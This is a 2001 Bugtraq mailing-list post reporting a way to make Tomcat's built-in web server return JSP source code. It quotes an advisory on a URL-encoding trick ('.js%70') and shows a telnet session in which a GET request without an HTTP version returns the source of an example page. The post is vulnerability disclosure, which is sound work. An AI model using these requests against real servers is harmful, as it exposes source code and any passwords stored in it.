[20022] in bugtraq
Re: Tomcat may reveal script source code by URL trickery
daemon@ATHENA.MIT.EDU (Eric Daniel Mauricio)
Wed Apr 4 06:54:49 2001
Message-ID: <200104032047.f33KlNL11550@spock.bestway.com.br>
Date: Tue, 3 Apr 2001 20:47:23 -0000
Reply-To: ericmau@BESTWAY.COM.BR
From: Eric Daniel Mauricio <ericmau@BESTWAY.COM.BR>
To: BUGTRAQ@SECURITYFOCUS.COM
There is another way to get the source from a jsp page using Tomcat.
If you don't write HTTP/1.0 or HTTP/1.1 in the end of the GET request,
you will get the source code and not the jsp processed.
In other words, use Apache + Tomcat if you intend to protect your source code.
telnet maq106 8080
Trying 10.0.0.106...
Connected to maq106
Escape character is '^]'.
GET /examples/jsp/num/numguess.jsp
HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 1237
Last-Modified: Tue, 19 Dec 2000 18:54:46 GMT
Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0;
Windows 95 4.0 x86; java.vendor=Sun Microsystems Inc.)
<!--
Copyright (c) 1999 The Apache Software Foundation. All rights
reserved.
Number Guess Game
Written by Jason Hunter, CTO, K&A Software
http://www.servlets.com
-->
<%@ page import = "num.NumberGuessBean" %>
<jsp:useBean id="numguess" class="num.NumberGuessBean" scope="session"/>
<jsp:setProperty name="numguess" property="*"/>
<html>
<head><title>Number Guess</title></head>
<body bgcolor="white">
<font size=4>
<% if (numguess.getSuccess()) { %>
Congratulations! You got it.
And after just <%= numguess.getNumGuesses() %> tries.<p>
<% numguess.reset(); %>
Care to <a href="numguess.jsp">try again</a>?
<% } else if (numguess.getNumGuesses() == 0) { %>
Welcome to the Number Guess game.<p>
I'm thinking of a number between 1 and 100.<p>
<form method=get>
What's your guess? <input type=text name=guess>
<input type=submit value="Submit">
</form>
<% } else { %>
Good guess, but nope. Try <b><%= numguess.getHint() %></b>.
You have made <%= numguess.getNumGuesses() %> guesses.<p>
I'm thinking of a number between 1 and 100.<p>
<form method=get>
What's your guess? <input type=text name=guess>
<input type=submit value="Submit">
</form>
<% } %>
</font>
</body>
</html>
Connection closed by foreign host.
[],
ericmau
"Sverre H. Huseby" <shh@THATHOST.COM> escreveu:
> Tomcat may reveal script source code by URL trickery
> ----------------------------------------------------
>
> Sverre H. Huseby advisory 2001-03-29
>
>
>
> Systems affected
> ----------------
>
> Tomcat 4.0-b1 (latest milestone) and nighly build as of 2001-03-28
> tested. Other versions may be vulnerable too. The problem is only
> present when using Tomcat's built in web server, not when using Tomcat
> with Apache Web Server.
>
>
> Description
> -----------
>
> Tomcat (http://jakarta.apache.org/tomcat/), the Reference
> Implementation for the Java Servlet 2.2 and JavaServer Pages 1.1
> Technologies, may be tricked into revealing the source code of JSP
> scripts by using simple URL encoding.
>
>
> Details
> -------
>
> It seems that the built in web server in Tomcat does URL decoding in
> an unreasonable order. URLs like the following
>
> http://XXX:8080/examples/jsp/num/numguess.js%70
>
> where %70 is an URL encoded 'p', returns the source code of index.jsp
> rather than running the script on the server side.
>
> To speculate: The JSP handler is skipped as this URL does not end in
> ".jsp", but the static file handler is nevertheless able to map the
> URL into a correct file name.
>
>
> Impact
> ------
>
> This design error makes it possible to fetch the source code of JSP
> scripts. Such source code may contain database passwords and file
> names, and may reveal design errors or programming bugs that make it
> possible to further exploit the server or service.
>
>
>
> Reported by Sverre H. Huseby, shh@thathost.com
>
> --
> <URL:mailto:shh@thathost.com>
> <URL:http://shh.thathost.com/>
>
